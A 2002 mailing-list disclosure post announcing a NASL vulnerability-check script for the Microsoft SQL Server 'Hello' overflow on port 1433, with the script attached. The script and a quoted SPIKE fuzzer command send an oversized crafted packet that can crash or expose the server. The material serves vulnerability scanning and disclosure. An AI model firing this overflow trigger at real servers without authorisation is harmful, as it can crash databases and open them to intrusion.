Date: 07 Aug 2002 11:10:19 -0400
From: Dave Aitel <[email protected]>
To: [email protected]Subject: MS SQL Server Hello Overflow NASL script
--=-MxOQRrO17dfkkETKWeQw
Content-Type: multipart/mixed; boundary="=-cIWr8WljaMzjhDWtDbAD"
--=-cIWr8WljaMzjhDWtDbAD
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
Since people seem unable to type: export LD_LIBRARY_PATH=3D. ;
./generic_send_tcp target 1433 audits/MSSQL/mssql.spk; I've attached a
NASL script that will also demonstrate the vulnerability. It even has
the correct ID number and will soon be available from the Nessus
homepage as well, for those of you who do a daily auto-update.
I'm not, however, planning to release NASL scripts for the Exchange 2000
vulnerabilities, nor do I plan to release a working exploit for the SQL
Server vulnerability (except to Immunity, Inc. larger customers, who
have access to all of Immunity's ongoing research.)=20
Dave Aitel
Immunity, Inc.
http://www.immunitysec.com/
=20
--=-cIWr8WljaMzjhDWtDbAD
Content-Disposition: attachment; filename=mssql_hello_overflow.nasl
Content-Type: text/plain; name=mssql_hello_overflow.nasl; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
if(description)
{
script_id(11067);
# script_cve_id("CVE-2000-0402");
script_version ("$Revision: 0.1 $");
name["english"] =3D "Microsoft SQL Server Hello Overflow";
script_name(english:name["english"]);
=20
desc["english"] =3D "
The remote MS SQL server is vulnerable to the Hello overflow.
An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,=20
as well as read your database content.=20
Solution : disable this service (Microsoft SQL Server).
Risk factor : High";
script_description(english:desc["english"]);
=20
summary["english"] =3D "Microsoft SQL Server Hello Overflow";
script_summary(english:summary["english"]);
=20
script_category(ACT_ATTACK);
=20
script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
family["english"] =3D "Windows";
script_family(english:family["english"]);
script_require_ports(1433);=20
exit(0);
}
#
# The script code starts here
#
#taken from mssql.spk
pkt_hdr =3D raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x15 ,0x00 ,0x=
06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03 ,0x00 ,0x28 ,0x00 ,0x04 ,0=
xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);
#taken from mssql.spk
pkt_tail =3D raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);
#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
port =3D 1433;
found =3D 0;
report =3D "The SQL Server is vulnerable to the Hello overflow.
An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.
Solution : disable this service (Microsoft SQL Server).
Risk factor : High";
if(get_port_state(port))
{
soc =3D open_sock_tcp(port);
if(soc)
{
#uncomment this to see what normally happens
#attack_string=3D"MSSQLServer";
#uncomment next line to actually test for overflow
attack_string=3Dcrap(560);
# this creates a variable called sql_packet
sql_packet =3D pkt_hdr+attack_string+pkt_tail;
send(socket:soc, data:sql_packet);
r =3D recv(socket:soc, length:4096);
close(soc);
display ("Result:",r,"\n");
if(!r)
{
display("Security Hole in MSSQL\n");
security_hole(port:port, data:report);
}
}
}
--=-cIWr8WljaMzjhDWtDbAD--
--=-MxOQRrO17dfkkETKWeQw
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQA9UThbB8JNm+PA+iURAkqDAKDVbL0jMZs+7YmslqtcifxRl8pPeACbBMUc
djUabrwFmT5XZ5rE/T7yuGs=
=Xsdg
-----END PGP SIGNATURE-----
--=-MxOQRrO17dfkkETKWeQw--
